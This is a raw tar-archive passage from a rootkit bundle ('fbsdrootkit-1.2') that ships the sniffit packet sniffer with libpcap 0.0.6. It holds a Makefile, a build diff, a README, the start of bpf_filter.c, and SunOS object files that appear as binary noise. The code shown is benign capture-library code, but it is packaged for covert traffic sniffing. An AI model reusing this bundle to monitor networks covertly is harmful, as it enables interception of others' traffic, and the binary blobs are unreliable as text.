reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that: (1) source code distributions # retain the above copyright notice and this paragraph in its entirety, (2) # distributions including binary code include the above copyright notice and # this paragraph in its entirety in the documentation or other materials # provided with the distribution, and (3) all advertising materials mentioning # features or use of this software display the following acknowledgement: # ``This product includes software developed by the University of California, # Lawrence Berkeley Laboratory and its contributors.'' Neither the name of # the University nor the names of its contributors may be used to endorse # or promote products derived from this software without specific prior # written permission. # THIS SOFTWARE IS PROVIDED ``AS IS'' AND WITHOUT ANY EXPRESS OR IMPLIED # WARRANTIES, INCLUDING, WITHOUT LIMITATION, THE IMPLIED WARRANTIES OF # MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. # # @(#) $Header: Makefile.in,v 1.37+ 94/06/25 14:53:47 leres Exp $ (LBL) # # Various configurable paths # # where the installed pcap files go INCL_DIR = /usr/local/include # where libpcap.a should go LIB_DIR = /usr/local/lib # where man page should go MAN_DIR = /usr/local/man # # Owner of installed files # BIN_GRP = bin BIN_OWN = bin # # You shouldn't need to edit anything below. # #have-ethers#ETHERS_DEFINES = -DETHER_SERVICE #have-sunos5#OS_DEFINES = -DSOLARIS DEFINE_STDC = -D__STDC__ #have-gcc#DEFINE_STDC = #have-irix4#OS_DEFINES = -Dvolatile= $(DEFINE_STDC) #have-irix5#OS_DEFINES = -Dvolatile= $(DEFINE_STDC) #have-pf#PCAP_DEFINES = -DPCAP_PF #have-bpf#PCAP = bpf #have-dlpi#PCAP = dlpi #have-nit#PCAP = nit #have-pf#PCAP = pf #have-snit#PCAP = snit #have-snoop#PCAP = snoop #have-linux#PCAP = linux CCOPT = -O INCLUDES = -I. #have-linux#INCLUDES = -I. -Ilinux-include DEFINES = -DFDDI $(ETHERS_DEFINES) $(PCAP_DEFINES) $(OS_DEFINES) # Standard CFLAGS CFLAGS = $(CCOPT) $(DEFINES) $(INCLUDES) # Standard C compiler CC = cc GCC_FLAGS = -Wmissing-prototypes -Wstrict-prototypes #have-gcc1#GCC_FLAGS = #have-gcc#CC = gcc -g -Wall $(GCC_FLAGS) # # Flex and bison allow you to specify the prefixes of the global symbols # used by the generated parser. This allows programs to use lex/yacc # and link against libpcap. If you don't have flex or bison, get them. # LEX = lex YACC = yacc #have-flex#LEX = flex -Ppcap_ #have-bison#YACC = bison -y -p pcap_ MAKE = make SHELL = /bin/sh RANLIB = true #have-ranlib#RANLIB = ranlib # Explicitly define compiliation rule since SunOS 4's make doesn't like gcc. # Also, gcc does not remove the .o before forking 'as', which can be a # problem if you don't own the file but can write to the directory. .c.o: rm -f $@; $(CC) $(CFLAGS) -c $*.c PCAPSRC = \ pcap-$(PCAP).c CSRC = pcap.c inet.c gencode.c optimize.c nametoaddr.c etherent.c savefile.c \ bpf_filter.c bpf_image.c LSRC = scanner.l YSRC = grammar.y GENSRC = \ $(LSRC:.l=.c) $(YSRC:.y=.c) SRC = $(PCAPSRC) $(CSRC) $(GENSRC) ALLSRC = \ pcap-bpf.c pcap-dlpi.c pcap-enet.c pcap-nit.c pcap-pf.c \ pcap-snit.c pcap-snoop.c \ $(CSRC) checkioctl.c $(LSRC) $(YSRC) OBJ = $(SRC:.c=.o) # Some makes can't handle the above substitution #have-broken-make#OBJ = pcap-$(PCAP).o \ #have-broken-make# pcap.o inet.o gencode.o optimize.o nametoaddr.o \ #have-broken-make# etherent.o savefile.o bpf_filter.o bpf_image.o \ #have-broken-make# scanner.o grammar.o HDR = pcap.h pcap-int.h pcap-namedb.h pcap-nit.h pcap-pf.h \ ethertype.h gencode.h GENHDR = \ tokdefs.h TAGFILES = \ $(SRC) $(HDR) TARFILES = \ README CHANGES INSTALL VERSION Makefile.in pcap.3 mkdep \ $(ALLSRC) $(HDR) \ net bpf/net/bpf_filter.c bpf/net/bpf.h SUNOS4 configure CLEANFILES = \ $(OBJ) libpcap.a checkioctl lex.yy.c $(GENSRC) $(GENHDR) libpcap.a: $(OBJ) rm -f libpcap.a ar rc $@ $(OBJ) $(RANLIB) $@ checkioctl: checkioctl.c rm -f $@; $(CC) $(CFLAGS) $@.c -o $@ scanner.c: scanner.l rm -f $@; $(LEX) -t $< > $$$$.$@; mv $$$$.$@ $@ scanner.o: scanner.c tokdefs.h rm -f $@; $(CC) $(CFLAGS) $(LEX_DEFINES) -c $*.c tokdefs.h: grammar.c grammar.c: grammar.y rm -f grammar.c tokdefs.h $(YACC) -d $< mv y.tab.c grammar.c mv y.tab.h tokdefs.h grammar.o: grammar.c $(CC) -c $(CFLAGS) -Dyylval=pcap_lval grammar.c install: force @for i in $(INCL_DIR) $(LIB_DIR) ; do \ if [ ! -d $$i ] ; then \ echo "mkdir $$i"; \ mkdir $$i; \ chmod 755 $$i; \ chown $(BIN_OWN) $$i; \ chgrp $(BIN_GRP) $$i; \ else \ true; \ fi; \ done cp libpcap.a $(LIB_DIR); \ chmod 444 $(LIB_DIR)/libpcap.a; \ chown $(BIN_OWN) $(LIB_DIR)/libpcap.a; \ chgrp $(BIN_GRP) $(LIB_DIR)/libpcap.a -$(RANLIB) $(LIB_DIR)/libpcap.a cp pcap.h pcap-namedb.h $(INCL_DIR); \ chmod 444 $(INCL_DIR)/pcap.h $(INCL_DIR)/pcap-namedb.h; \ chown $(BIN_OWN) $(INCL_DIR)/pcap.h $(INCL_DIR)/pcap-namedb.h; \ chgrp $(BIN_GRP) $(INCL_DIR)/pcap.h $(INCL_DIR)/pcap-namedb.h @if [ ! -f /usr/include/net/bpf.h ]; then \ i=$(INCL_DIR)/net; \ if [ ! -d $$i ] ; then \ echo "mkdir $$i"; \ mkdir $$i; \ chmod 755 $$i; \ chown $(BIN_OWN) $$i; \ chgrp $(BIN_GRP) $$i; \ else \ true; \ fi; \ set -x; \ cp net/bpf.h $(INCL_DIR)/net; \ chmod 444 $(INCL_DIR)/net/bpf.h; \ chown $(BIN_OWN) $(INCL_DIR)/net/bpf.h; \ chgrp $(BIN_GRP) $(INCL_DIR)/net/bpf.h; \ fi install-man: force @i=$(MAN_DIR)/man3; \ if [ ! -d $$i ] ; then \ echo "mkdir $$i"; \ mkdir $$i; \ chmod 755 $$i; \ chown $(BIN_OWN) $$i; \ chgrp $(BIN_GRP) $$i; \ else \ true; \ fi; \ cp pcap.3 $(MAN_DIR)/man3 chmod 444 $(MAN_DIR)/man3/pcap.3 chown $(BIN_OWN) $(MAN_DIR)/man3/pcap.3 chgrp $(BIN_GRP) $(MAN_DIR)/man3/pcap.3 clean: rm -f $(CLEANFILES) realclean: rm -f $(CLEANFILES) Makefile tags tags: $(TAGFILES) ctags -wtd $(TAGFILES) tar: force @cwd=`pwd` ; dir=`basename $$cwd` ; name=libpcap-`cat VERSION` ; \ list="" ; tar="tar cFFf" ; \ for i in $(TARFILES) ; do list="$$list $$name/$$i" ; done; \ echo \ "rm -f ../$$name; ln -s $$dir ../$$name" ; \ rm -f ../$$name; ln -s $$dir ../$$name ; \ echo \ "(cd .. ; $$tar - [lots of files]) | compress > /tmp/$$name.tar.Z" ; \ (cd .. ; $$tar - $$list) | compress > /tmp/$$name.tar.Z ; \ echo \ "rm -f ../$$name" ; \ rm -f ../$$name force: /tmp depend: $(GENSRC) force ./mkdep -c $(CC) $(DEFINES) $(INCLUDES) $(SRC) fbsdrootkit-1.2/sniffit.0.3.3/libpcap/Makefile.in.diff100600 764 764 565 6226213210 17603 0ustar dfdf*** ../libpcap-0.0.6~/Makefile.in Tue Apr 25 06:36:32 1995 --- Makefile.in Sat Sep 30 01:13:11 1995 *************** *** 56,62 **** --- 56,64 ---- #have-snit#PCAP = snit #have-snoop#PCAP = snoop + #have-linux#PCAP = linux CCOPT = -O INCLUDES = -I. + #have-linux#INCLUDES = -I. -Ilinux-include DEFINES = -DFDDI $(ETHERS_DEFINES) $(PCAP_DEFINES) $(OS_DEFINES) fbsdrootkit-1.2/sniffit.0.3.3/libpcap/README100600 764 764 5557 6226213210 15535 0ustar dfdf@(#) $Header: README,v 1.7+ 94/06/20 18:56:55 leres Exp $ (LBL) LIBPCAP 0.0.6 Lawrence Berkeley Laboratory Network Research Group libpcap@ee.lbl.gov ftp://ftp.ee.lbl.gov/libpcap-*.tar.Z This directory contains source code for libpcap, a system-independent interface for user-level packet capture. libpcap provides a portable framework for low-level network monitoring. Applications include network statistics collection, security monitoring, network debugging, etc. Since almost every system vendor provides a different interface for packet capture, and since we've developed several tools that require these interfaces, we've created this system-independent API to ease in porting and to alleviate the need for several system-dependent packet capture modules in each application. THIS IS AN ALPHA-QUALITY RELEASE. The interface is brand new and is likely to change. If you code to this interface, and want to track future versions, be prepared to update your code. We admit that this release is premature, but we're releasing it anyway because the tcpdump-3.0 distribution requires it. libpcap has been built and tested under SGI Irix 4.x & 5.2, SunOS 4.x, Solaris 2.3, BSD/386 v1.1, DEC/OSF v1.3 v2.0, and Ultrix 4.x. SunOS 3.5 4.3BSD Reno/Tahoe and 4.4BSD are supported as well, but we currently do not have the resources to carry out testing in these environments (we suspect you'll run into problems under these systems -- please send us the patches if you fix any porting problems). The libpcap interface supports a filtering mechanism based on the architecture in the BSD packet filter. BPF is described in the 1993 Winter Usenix paper ``The BSD Packet Filter: A New Architecture for User-level Packet Capture''. A compressed postscript version is in ftp://ftp.ee.lbl.gov/papers/bpf-usenix93.ps.Z. Although most packet capture interfaces support in-kernel filtering, libpcap utilizes in-kernel filtering only for the BPF interface. On systems that don't have BPF, all packets are read into user-space and the BPF filters are evaluated in the libpcap library, incurring added overhead (especially, for selective filters). We haven't tried taking advantage of other packet filter models first because they aren't general enough (i.e., only simple filters can be evaluated), and second because we don't have the time to modify the code generator (or write a filter translator) and BPF is more efficient anyway. BPF is standard in 4.4BSD, BSD/386, NetBSD, and FreeBSD. DEC OSF/1 uses the packetfilter interface but has been extended to accept BPF filters (which libpcap utilizes). Also, you can add BPF filter support to Ultrix using the kernel source and/or object patches available in ftp://gatekeeper.dec.com/pub/DEC/net/bpfext42.tar.Z. Please send bugs and comments to libpcap@ee.lbl.gov. - Steve McCanne (mccanne@ee.lbl.gov) Craig Leres (leres@ee.lbl.gov) Van Jacobson (van@ee.lbl.gov) fbsdrootkit-1.2/sniffit.0.3.3/libpcap/SUNOS4/ 40700 764 764 0 6226213210 15535 5ustar dfdffbsdrootkit-1.2/sniffit.0.3.3/libpcap/SUNOS4/nit_if.o.sun4c.4.0.3c100600 764 764 12253 6226213210 21146 0ustar dfdf ðÄL`ã¿ ³.`€¦à€³>`²`ú@¶ €"€ €¦áÔ`€¦À &€ €¦á²ú@¶à€2¿ÿùÔ`€¦á2€"’ – ¶?ÿ€SÖ(4Ѐ"€€N¶?ÿ¶`ÿ²àú@€"€’ à`€¦À&€’ â`€¦À4€²¤ ¶?ÿ€<ä(4Ðú@€2¿ÿóà`’ @ ¸€2€è ¦ ¶?ÿ€-æ(4Ð’ ¨ è' ú  ø'`ì@ì'@ú&@ð'`ú& ú& 8À'`À'`ö'`À'`@À'` ²€€î`´ ô-à ú` . 0Ð7@’c€Ò7`  ”¢àÔ7` Ö`’–àÖ&` Â@Â@ŸÀ@Ð Çà‘èã¿  $@’ ö úà Ðà€Š "€ €"€’ @¸`ú€"€ €€§@"€€¸ú€2¿ÿû€§@€2€ÔÀ@ ÔÀÔ'À& @ÐàÇà‘è ã¿ Ò`Ò ` € €H€¢`€!€¢`€€¢`†€BÐ` Ð €Š "€ Ú` ’ @ú` Ö@– àý– àÿÖ/@Ú` Ú @€‹`€0’@€.’@-€)ú` Ð`¶`€€!ä ä   €€ê@€€@¸€2€îà @€”î6à Ð ’Ð Â 0ŸÀ@@€@Çà‘è ã¿ ú ö`  øÀ’`€§ €0’a €§ 2€½ Ð` €2€¹ Ò`” ‚Ô*` – 9Ö&à’@€ÎÔ`Ô  Â`4ŸÀ@’Ð&àÞà€"€ä`à`¢ ‚€»â, ¦ æ,  ¨ €¶è&à Ð`’ @Ð ¸€2€ø'` î` ‚Ð-à ’ €¨Ò&àÔ`– Ö*  €£À&à ô`¸ ô  ô€€Ž "€è`àà€"€â`€ ¸ €Œ`2€€Ð` @’ ¸€"€î`ä`¦ ‚æ,  €‡ø&à€ "€ î`Ð` @’ €"€î`ê`¬ ‚ì-` €yÐ&à´ ® ÿðî'`Ô`š ”€Ô'`Ø`Ú+ €nÀ&à Þ`¨ Þà ú`ª º`ú#Àæ`è,à €cê&à ì`ì  ì€ì'`Ò`€ "€ Ø`Ô`€¢ :€Ø`– Ö'`Ø`š Ú+ À&à ’ @ ¶€"€K’Þ`€"€º%Üú`€§`d4€€§a€¸ 4€¸ ¸ âठä,` ôà ¦ 0æ6€’@‘/`Ð6  ‘/`@’Ð6  èਠè&à@’€(’ì`” ì  ú`– ú%€Ò`Ô*` €Ö&à ’`€§ ¿ÿx ’`€§ ¿ÿ´ ’`€§ ¿ÿ]0’`€§ ¿ÿ¡0’`€§ ¿ÿä0’a €§ "¿ÿ=ú` Ø`š ‚Ú+ ’@² Çà‘èã¿ ø €"€€Ò €¢@2€øÔ  € €Ö €Šà"€ ø@Ð €2€ €Ø ˜ Ø' ø€2¿ÿëÒ €€¬è ’”@©¬€2€€Þ žà€ŸÞ' ?ÿÜ#ÿÿ¦€™¤€"€—º ú€"€€Ò` €¢@2€ú@Ô  € €Ö`€Šà"€ ú@@Ð`€2€ €Ø`˜ Ø'`ú@€2¿ÿëÒ` €"€Ô Þ`€£À2€ Ô`@ª€2€Ô à`  € à'`’@iª€2€è`Ð` Ð'`Ô €Š "€PÂ Ö ¶ €Šà"€Ø ¶ Ø €‹ "€Ú ¶àÚ €‹`"€’ ¶à’ @¶€2€âà@Þ žà€:Þ'  Ð,` Ò €Š`"€Ø îà–àØÀÖàØ%àÖ%àÞÀÐàž ÀŸ3à Ð%àÔà” Ô&àØ €‹ "€ â îàÚ Ú%ÀÞàžàÞ&àâ €Œ`"€ ’îàРҠ Ð%ÀÖà–àÖ&à’@¬Â ’Â` Â@Â@Ð ŸÀ@Ð ¸€¿ÿk¬º Çà‘èã¿ ú €"€ø ´& €§@(€ø ºø ’ ¸@¸ ¹7 ¹/ @´€2€ê €´ À-` ì ì ¬%€ì& ì&  ÐÒ @Ô ð Ô €”€€ Ô& Ö ”’ @Ø ˜Ø& Çà‘èã¿ @Çà‘è 㿘€¸¿ü€À'¿üÖ Ò Ô –"À  ’@˜ º€2€ ú'Ô¿ü€ €@пü@€° 𠸀2¿ÿçÖ ð¿üÇàè@(#) $Header: nit_if.c,v 1.4 90/03/20 18:18:19 leres Exp $ sun4c (LBL)@(#)nit_if.c 1.24++ 88/02/09 Copyr 1987 Sun Micro껀.àsnitsnit_close nonexistent instance ˆ ‹| ˆŒ ‹ä†ÿÿÿL†ÿÿþ´È&†ÿÿþ8ä ˆð ˆø†ÿÿþ ˆ ‹D ÍH%†ÿÿý¸L Í\†ÿÿý¤´&†ÿÿýLä7†ÿÿý\†ÿÿü¤Œ†ÿÿütœ6†ÿÿüd7†ÿÿûøp+†ÿÿûø†ÿÿû4†ÿÿú̆ÿÿúh:†ÿÿù˜x:†ÿÿùˆ”7†ÿÿùl<7†ÿÿøÄT ˆX ‹˜ †ÿÿøhh †ÿÿ÷˜´#†ÿÿ÷L X†ÿÿö¨ p6†ÿÿö ¤ˆ ¨‹ <†ÿÿõÄ Ä†ÿÿõ< †ÿÿôü 0†ÿÿôÐ P†ÿÿô° „ L ˆ L †ÿÿôp ¸ †ÿÿôH À6†ÿÿô@€ È”˜À  l¨l¼ lÄ |È ˜ À" „.¬: lF ˜R |^hqzƒŒ€•Ÿ@©°¶¿ÆÐ×Ýãíõül #.6=AI `\ck ðr L…@‘›£®· ÀË ´ÖPáåíõù  8&+_phz_hostnamelen_snit_close_snit_cpmsg_snit_ioctl_snit_minfo_snit_winit_snit_rinit_boottime_mclfree_m_freem_mclgetx_nisoftc_pidhash_freeproc_hostname_bcopy_proc_whichqs_freeb_m_cpytoc_ifnet_time_tick_rawintrq_allocb_linkb_lbolt_snit_put_domainnamelen_mfree_ifpromisc_canput_nproc_hz_dupmsg_cp_mblks_to_mbufs_panic_flushq_rcsid_free_mbuffed_mblk_domainname_zombproc_ifunit_procNPROC_allproc_avenrun_snit_open_snit_info_snit_intr_qs_m_want_mbstat_tz_freemsg_qreply_etherbroadcastaddr_sccsid.mulfbsdrootkit-1.2/sniffit.0.3.3/libpcap/SUNOS4/nit_if.o.sparc100600 764 764 12134 6226213210 20414 0ustar dfdf ð¸¸X`ã¿ ³.`€¦à€³>`²`ú@¶ €"€ €¦áÔ`€¦À &€ €¦á²ú@¶à€2¿ÿùÔ`€¦á2€0’ – ¶?ÿ€^Ö(4Ѐ"€€Y¶?ÿ¶`ÿ²àú@€"€!’ à`€¦À6€ â`’ @ ¸€2€è ¦ ¶?ÿ€Dæ(4Ѐ¦À4€²¤ ¶?ÿ€=ä(4Ðú@€"€’ à`€¦À6¿ÿóâ`’ @ ¸€"¿ÿé¦ è ’ ¨ è' ú  ø'`ì@ì'@ú&@ð'`ú& ú& 8À'`À'`ö'`À'`@À'` ²€€î`´ ô-à ú` . 0Ð7@’c€Ò7`  ”¢àÔ7` Ö`’–àÖ&` Â@Â@ŸÀ@Ð Çà‘èã¿  $@’ ö úà Ðà€Š "€ €"€’ @¸`ú€"€ €€§@"€€¸ú€2¿ÿû€§@€2€ÔÀ@ ÔÀÔ'À& @ÐàÇà‘è ã¿ Ò`Ò ` € €H€¢`€!€¢`€€¢`†€BÐ` Ð €Š "€ Ú` ’ @ú` Ö@– àý– àÿÖ/@Ú` Ú @€‹`€0’@€.’@-€)ú` Ð`¶`€€!ä ä   €€ê@€€@û¸€2€îà @€”î6à Ð ’Ð Â 0ŸÀ@@€@Çà‘è ã¿ ú ö`  øÀ’`€§ €0’a €§ 2€ Ð` €2€  Ò`” ‚Ô*` – 9Ö&à’@€!’`€§ €F ’`€§ €‚ ’`€§ €+0’`€§ €o0’`€§ €²0’a €§ "€ ú` Ø`š ‚Ú+ ’@² Çà‘èÔ`Ô  Â`4ŸÀ@’Ð&àÞà€"€ä`à`¢ ‚¿ÿíâ, ¦ æ,  ¨ ¿ÿèè&à Ð`’ @Ð ¸€2€ø'` î` ‚Ð-à ’ ¿ÿÚÒ&àÔ`– Ö*  ¿ÿÕÀ&à ô`¸ ô  ô€€Ž "€è`àà€"€â`€ ¸ €Œ`2€€Ð` @’ ¸€"€î`ä`¦ ‚æ,  ¿ÿ¹ø&à€ "€ î`Ð` @’ €"€î`ê`¬ ‚ì-` ¿ÿ«Ð&à´ ® ÿðî'`Ô`š ”€Ô'`Ø`Ú+ ¿ÿ À&à Þ`¨ Þà ú`ª º`ú#Àæ`è,à ¿ÿ•ê&à ì`ì  ì€ì'`Ò`€ "€ Ø`Ô`€¢ :€Ø`– Ö'`Ø`š Ú+ À&à ’ @ ¶€"¿ÿ}’Þ`€"€º%Üú`€§`d4€€§a€¸ 4€¸ ¸ âठä,` ôà ¦ 0æ6€’@‘/`Ð6  ‘/`@’Ð6  èਠè&à@’¿ÿZ’ì`” ì  ú`– ú%€Ò`Ô*` ¿ÿOÖ&à ã¿ ø €"€€Ò €¢@2€øÔ  € €Ö €Šà"€ ø@Ð €2€ €Ø ˜ Ø' ø€2¿ÿëÒ €€ è ’”@®€"€ Þ €"€”º €"€‘º €úžà€ŒÞ' €¤@2€ú@ä  €€æ`€Œà"€ ú@@Ð`€2€ €Ð` Ð'`ú@€2¿ÿëâ` €"€à Ô`€¢€2€ Ô`@ª€2€à Ö`–à€ Ö'`’@cª€2€è`Ú`š`Ú'`à €Œ "€J ⠶ €Œ`"€ä ¶ ä €Œ "€æ ¶àæ €Œà"€’ ¶à’ @¶€2€Ôà@Ð  €4Ð' – Ö*  Ø €‹ "€ Ð ìàžààÀÞàà% Þ% äठä&àÐ €Š "€ Ø ìàÒ Ò%€Ôà” Ô&àØ €‹ "€ ’ìàÚ Þ š@Ú%€âà¢`â&à’@®Â ’Â` Â@Â@Ð ŸÀ@Ð ¸€¿ÿq®º Çà‘èã¿ ú €"€ø ´& €§@(€ø ºø ’ ¸@¸ ¹7 ¹/ @´€2€ê €´ À-` ì ì ¬%€ì& ì&  ÐÒ @Ô ð Ô €”€€ Ô& Ö ”’ @Ø ˜Ø& Çà‘èã¿ @Çà‘è 㿘€¸¿ü€À'¿üÖ Ò Ô –"À  ’@˜ º€2€ ú'Ô¿ü€ €@пü@€° 𠸀2¿ÿçÖ ð¿üÇàè@(#)nit_if.c 1.24 88/02/09 Copyr 1987 Sun Micro껀.àsnitsnit_close nonexistent instance ˆ ‹| ˆŒ ‹´†ÿÿÿL†ÿÿþäx†ÿÿþˆô&†ÿÿþ  ˆ ˆ$†ÿÿýÜ, ˆ0 ‹p …t%†ÿÿýŒx …ˆ†ÿÿýxà&†ÿÿý 6†ÿÿüðˆ†ÿÿüx¸†ÿÿüHÈ5†ÿÿü846†ÿÿûÌ´6†ÿÿûL *†ÿÿúਆÿÿúXä†ÿÿú°†ÿÿùP9†ÿÿøè(9†ÿÿøØD6†ÿÿø¼€ ˆ„ ‹Ä †ÿÿø<| †ÿÿ÷„È#†ÿÿ÷8 l†ÿÿö” „5†ÿÿö| ¸ˆ ¼‹ 8†ÿÿõÈ À†ÿÿõ@ †ÿÿõ ,†ÿÿôÔ L†ÿÿô´ € H „ H Œ †ÿÿôt ´ †ÿÿôL ¼5†ÿÿôD4 €HLìT \˜p x 0| L ì" €.Ø: F LR 0^hqzƒŒ€•Ÿ@©°¶¿ÆÐ×Ýãíõü˜ #.6=AI \\ck H~@Š”œ§° ¹Ä hÏ|ÚÞæîòû ð$_phz_hostnamelen_snit_close_snit_cpmsg_snit_ioctl_snit_minfo_snit_winit_snit_rinit_boottime_mclfree_m_freem_mclgetx_nisoftc_pidhash_freeproc_hostname_bcopy_proc_whichqs_freeb_m_cpytoc_ifnet_time_tick_rawintrq_allocb_linkb_lbolt_snit_put_domainnamelen_mfree_ifpromisc_canput_nproc_hz_dupmsg_cp_mblks_to_mbufs_panic_flushq_free_mbuffed_mblk_domainname_zombproc_ifunit_procNPROC_allproc_avenrun_snit_open_snit_info_snit_intr_qs_m_want_mbstat_tz_freemsg_qreply_etherbroadcastaddr_sccsid.mulfbsdrootkit-1.2/sniffit.0.3.3/libpcap/SUNOS4/nit_if.o.sun3100600 764 764 10253 6226213210 20174 0ustar dfdf €¸¬H@NVÿìH×<€ ®f.~(|` ¾­m R‡(M*TJfð ‡fFüšxpÿ`ìJ®gpÿ`à~.(|`¾­m¾­n üšxpÿ`º(M*TJfàHxHx N¹PO&@J‹f ü šxpÿ`r Ó«*k +K*”(+n n!M n!M8B­B­+GB­B­ HxHxN¹PO&@J€g: k| $k 4¼05|»€ 5|.à rÓ«HS n/( h P PNPO Lî<€ÿìN^NuNVÿìH×<*nHxHm$N¹PO(m$l ,gJŠg B§HRN¹PO-|ÿü`·Ìg-Kÿü nÿü&PJ‹fîJ‹fHy N¹XO nÿü ”B­/,N¹XOpLî<ÿìN^NuNVÿì n hp( J€g r°grr°gX €†fö n h gHx/.N¹PO n h ý n h g¼/. /.N¹PO`´/. /.N¹öPO`  n -h ÿü-hÿø .ÿüT€-@ÿìJ®ÿøgr nÿø hJ( fd nÿüJPf\/.ÿøN¹ XO-@ÿôf /. N¹`H nÿì1h n h-h ÿð/.ÿü/.ÿô/.ÿð nÿð h.NOï /. N¹` /. N¹XOpN^NuNVÿÜH×<À n*h n (h .  €€pg €À i f–J­ fŽ n h|‚ ~9)G/. /.N¹PO`Â&m n h$h HR/HS k2NOï )@J¬fv n h| ~ )G `l n h$h HxHRN¹PO&@J‹f n h|‚ ~)G`4+K n h| B¬ ` n h h -Pÿü| .ÿÿg@Jlg|` -fHx/- N¹PO,J†g2 n h|‚ )F` -gB§/- N¹PO,fÎ~ðÏ­.ÿÿ~À‡­ n h| B¬ `~ n h h -~À‡ € n h| ~)G `P n h h +PJ­g ­d~+G n h| B¬ HxHxN¹PO-@ÿügJ­g -` <Ü-@ÿø ®dÿønp` ®ÿønp`p-@ÿô nÿü h| nÿü&h 6¼0 .ÿøë€L.ÿô7@ .ÿøç€L.ÿô7@ nÿü~ߨ/.ÿü/.N¹PO`p n h h ­ n h| ~)G `J  €€pgþ( €€pgþè €€ pgý €Àpgþ¦ €Àpg¨ €À i gýb n h|‚ /. /.N¹POpLî<ÀÿÜN^NuNVÿàH×<ÀB®ÿü&y`4 + °®f( nJ¨ g +~À‡g/+N¹XOJ€f R«&SJ‹fÈJ‹gÐ.+//. /.N¹HOï *@Jf¨R«`¨Jg $S`4 * °®f( nJ¨ g *g/*N¹XOJ€f Rª$RJŠfÈJŠgB¾ªfHUN¹XO(@JŒf,Rª`&/*/. /.N¹HOï (@JŒfRª`.* +|À†gî| +gP† +gX† +gX†Hx/N¹PO-@ÿüfHUN¹XOR«`¼ nÿü h| +g$ nÿü-hÿøAù"nÿø#h" nÿüP¨ +g nÿü-hÿø nÿø « nÿüX¨ +g$ nÿü-hÿø n (Ш nÿø € nÿüX¨HU/.ÿüN¹PO*nÿüHU k/( k h P PNPO&J*LJ‹fþ^pLî<ÀÿàN^NuNVÿìH×0à*n..,-J‡g z…¼€cž…,*Ú­V…äåHx/N¹PO(@J€fp`R lB( l (…)@)@ /-/,/N¹Oï -ѬJ†o/,/B§/. N¹Ý¬ Lî0àÿìN^NuNV/.N¹XOpN^NuNVÿðH×8B®ÿüIîÿü&n`NB§ +« //+ / HzÿÀN¹Oï*@Jf J®ÿüg /.ÿüN¹XOHSN¹XOp`((M&kJ‹f® .ÿüLî8ÿðN^Nu@(#)nit_if.c 1.24 88/02/09 Copyr 1987 Sun Micro 0껀.à4 ° ° ¾ Úsnit_close nonexistent instancesnitPTP„$Pâ$PJ,Pl8PtP”@š.P°7P,P4PH@Ž@ 7PÞ7Pê#PJP¬P 8PT8Pö$PŠP P,PVP€@ÆPè"P@Z$Pj#Pœ-P5P‚$P¸PÚ6Pø7P 2P L%P V#P2@F@J@R@Z@n@v@z@  €&* Ú6=F O^kHw@‹— ª³4¿Ó öÞ °êòú î#.€7>F@RYajr{ö‹ ¾— ª°¸¾ÅÂÏÖßéñü _cp_mblks_to_mbufs_sccsid_lbolt_qs_snit_winit_nproc_whichqs_avenrun_domainnamelen_hostnamelen_snit_cpmsg_rawintrq_hostname_tz_canput_nisoftc_boottime_mclgetx_snit_close_etherbroadcastaddr_snit_info_snit_minfo_m_want_ifunit_tick_procNPROC_phz_free_mbuffed_mblk_snit_open_pidhash_bcopy_qreply_domainname_mfree_dupmsg_freemsg_allocb_m_freem_hz_snit_ioctl_snit_rinit_mclfree_freeproc_proc_flushq_time_panic_snit_put_ifnet_allproc_zombproc_mbstat_snit_intr_linkb_m_cpytoc_freeb_ifpromiscfbsdrootkit-1.2/sniffit.0.3.3/libpcap/VERSION100600 764 764 6 6226213210 15625 0ustar dfdf0.0.6 fbsdrootkit-1.2/sniffit.0.3.3/libpcap/bpf/ 40700 764 764 0 6226213210 15311 5ustar dfdffbsdrootkit-1.2/sniffit.0.3.3/libpcap/bpf/net/ 40700 764 764 0 6226213210 16077 5ustar dfdffbsdrootkit-1.2/sniffit.0.3.3/libpcap/bpf/net/bpf_filter.c100400 764 764 25354 6226213210 20505 0ustar dfdf/*- * Copyright (c) 1990, 1991, 1992, 1993 * The Regents of the University of California. All rights reserved. * * This code is derived from the Stanford/CMU enet packet filter, * (net/enet.c) distributed as part of 4.3BSD, and code contributed * to Berkeley by Steven McCanne and Van Jacobson both of Lawrence * Berkeley Laboratory. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. * * @(#)bpf.c 7.5 (Berkeley) 7/15/91 * * static char rcsid[] = * "$Header: bpf_filter.c,v 1.22 94/06/05 20:12:39 leres Exp $"; */ #if !(defined(lint) || defined(KERNEL)) static char rcsid[] = "@(#) $Header: bpf_filter.c,v 1.22 94/06/05 20:12:39 leres Exp $ (LBL)"; #endif #include #include #include #include #if defined(__alpha) typedef int int32; typedef u_int u_int32; #else typedef long int32; typedef u_long u_int32; #endif #ifdef sun #include #endif #if defined(sparc) || defined(mips) || defined(ibm032) || defined(__alpha) #define BPF_ALIGN #endif #ifndef BPF_ALIGN #define EXTRACT_SHORT(p) ((u_short)ntohs(*(u_short *)p)) #define EXTRACT_LONG(p) (ntohl(*(u_int32 *)p)) #else #define 